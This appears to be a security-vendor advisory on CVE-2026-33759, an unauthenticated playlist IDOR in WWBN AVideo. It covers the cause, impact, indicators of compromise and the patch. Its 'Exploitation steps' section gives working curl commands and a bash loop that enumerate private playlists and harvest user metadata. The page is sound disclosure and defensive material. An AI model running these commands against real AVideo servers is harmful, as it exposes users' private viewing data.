CVE-2026-33759: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33759 is an unauthenticated Insecure Direct Object Reference (IDOR) vulnerability in WWBN AVideo affecting all versions up to and including 26.0. The flaw exists in the objects/playlistsVideos.json.php endpoint, which returns full video contents of any playlist by ID without authentication or authorization checks, exposing private and unlisted playlists to unauthenticated attackers. It was published by DanielnetoDotCom on March 24, 2026, and added to the GitHub Advisory Database on March 26, 2026. The vulnerability carries a CVSS v3.1 base score of 5.3 (Medium) (GitHub Advisory).

Technical details

The root cause is a missing authorization check (CWE-862) combined with an authorization bypass through a user-controlled key (CWE-639) in objects/playlistsVideos.json.php. The endpoint accepts a playlists_id parameter and directly invokes PlayList::getVideosFromPlaylist() without any ownership or visibility validation, while the listing endpoint playlistsFromUser.json.php correctly enforces visibility controls. Because playlist IDs are sequential integers, an unauthenticated attacker can trivially enumerate all playlists — including watch_later, favorite, and custom private types — by incrementing the playlists_id parameter. The underlying SQL query in objects/playlist.php joins playlists_has_videos, videos, and users tables with no authorization filter, returning full video metadata for any requested playlist ID (GitHub Advisory, Patch Commit).

Impact

Successful exploitation allows an unauthenticated remote attacker to enumerate all users' watch histories, favorites, and private or unlisted custom playlists that were intentionally hidden from public view. Exposed data includes video titles, filenames, direct URLs, user account information, comments, and subscriber counts associated with videos in private playlists. This constitutes a significant privacy violation, revealing user viewing habits and content preferences at scale, with no integrity or availability impact (GitHub Advisory).

Exploitability

A public proof-of-concept (PoC) exploit consisting of concrete curl commands and a bash enumeration loop is available in the GitHub security advisory, making exploitation straightforward with no authentication required (GitHub Advisory). There is no current evidence of in-the-wild exploitation or threat actor attribution. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.042% (0.000420), placing it in the 22nd percentile for exploitation probability within 30 days (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing AVideo instances (version ≤ 26.0) using search engines like Shodan or Censys, or by browsing to the target's AVideo installation URL.
  2. Probe the vulnerable endpoint: Send an unauthenticated HTTP GET request to the vulnerable endpoint with a known or guessed playlist ID:
    curl -s "http://TARGET/objects/playlistsVideos.json.php?playlists_id=1" | python3 -m json.tool
    A successful response returns full video metadata (titles, filenames, URLs, user info, comments) for playlist ID 1.
  3. Enumerate all playlists: Iterate through sequential integer IDs to discover and extract contents of all playlists, including private watch_later and favorite types:
    for i in $(seq 1 50); do
      result=$(curl -s "http://TARGET/objects/playlistsVideos.json.php?playlists_id=$i")
      count=$(echo "$result" | python3 -c "import sys,json; print(len(json.load(sys.stdin)))" 2>/dev/null)
      if [ "$count" != "0" ] && [ -n "$count" ]; then
        echo "Playlist $i: $count videos"
      fi
    done
  4. Confirm private playlist bypass: Verify that the listing endpoint playlistsFromUser.json.php hides private playlists while the videos endpoint exposes their contents, confirming the authorization bypass.
  5. Harvest metadata: Parse the JSON responses to collect video filenames, direct URLs, user account details, comments, and subscriber counts for all discovered playlists (GitHub Advisory).

Indicators of compromise

  • Network: High volume of unauthenticated HTTP GET requests to /objects/playlistsVideos.json.php with sequentially incrementing playlists_id values (e.g., ?playlists_id=1, ?playlists_id=2, ...) from a single or small set of IP addresses; similar patterns targeting the clean URL /playListsVideos.json.
  • Logs: Web server access logs showing rapid sequential requests to playlistsVideos.json.php or playListsVideos.json without any session cookie or authentication header; absence of corresponding requests to playlistsFromUser.json.php (indicating targeted enumeration rather than normal browsing).
  • Logs: Requests returning HTTP 200 responses for playlist IDs that belong to private or unlisted playlists, especially in bulk or automated patterns (GitHub Advisory).

Mitigation and workarounds

The fix is available in commit bb716fbece656c9fe39784f11e4e822b5867f1ca, which adds a PlayList::canSee() authorization check to objects/playlistsVideos.json.php before returning playlist contents, and corrects a variable name bug ($playListCanSe → $playListCanSee) in objects/playlist.php that previously caused the visibility check to malfunction (Patch Commit). Administrators should update AVideo to a version incorporating this commit immediately. As a temporary workaround, restrict access to objects/playlistsVideos.json.php via web server configuration (e.g., require authentication at the server level), and consider migrating playlist IDs to non-sequential, opaque identifiers to prevent bulk enumeration (GitHub Advisory).

Community reactions

The vulnerability was reported by a researcher identified as "offset" and published by DanielnetoDotCom (the AVideo maintainer) on March 24, 2026. Coverage appeared on aggregator sites including VulDB, cvefeed.io, radar.offseq.com, and a dedicated write-up at infinitsec.net shortly after disclosure. No significant vendor statements beyond the advisory itself or notable social media debate have been identified.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management